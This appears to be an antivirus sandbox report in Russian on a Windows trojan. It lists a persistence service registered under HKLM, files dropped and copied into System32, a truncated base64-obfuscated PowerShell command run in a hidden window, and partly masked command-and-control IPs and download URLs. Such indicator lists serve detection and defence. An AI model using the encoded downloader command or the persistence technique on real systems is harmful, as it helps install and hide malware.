Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\wmpshell] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\wmpshell] 'ImagePath' = '"<SYSTEM32>\dnscacheugc\wmpshell.exe"'
- 'wmpshell' "<SYSTEM32>\dnscacheugc\wmpshell.exe"
- 'wmpshell' <SYSTEM32>\dnscacheugc\wmpshell.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADkAYwB4AHIANQBiAD0AKAAnAEMAJwArACgAJwBoAHAAdABzACcAKwAnAG4AJwApACsAJwA1ACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAdABlAE0AUABcAFcAbwByAGQAXAAyADAAMQA5AF...
- %TEMP%\word\2019\spfb0wz5.exe
- <SYSTEM32>\dnscacheugc\wmpshell.exe
- %TEMP%\word\2019\spfb0wz5.exe в <SYSTEM32>\dnscacheugc\wmpshell.exe
- '45.##.219.163':443
- http://ri####nterprise.com/dist/go/0Ay/
- http://19#.##1.86.6:443/fnY1jf8deKSNN9/jq7hHjkB34zA9HTC9Rc/x972/
- http://45.##.219.163:443/IbTgScpdb63lg0o48/x5DNLFYB/VAuehms8RfcZFXzSc2i/l3tM6IOG6Nwzk/JFI20RYG/g8Nbdf3/ via 45.##.219.163
- DNS ASK ri####nterprise.com
- DNS ASK ns#.#60wisp.net
- '%TEMP%\word\2019\spfb0wz5.exe'
- '<SYSTEM32>\dnscacheugc\wmpshell.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADkAYwB4AHIANQBiAD0AKAAnAEMAJwArACgAJwBoAHAAdABzACcAKwAnAG4AJwApACsAJwA1ACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAdABlAE0AUABcAFcAbwByAGQAXAAyADAAMQA5AF...' (со скрытым окном)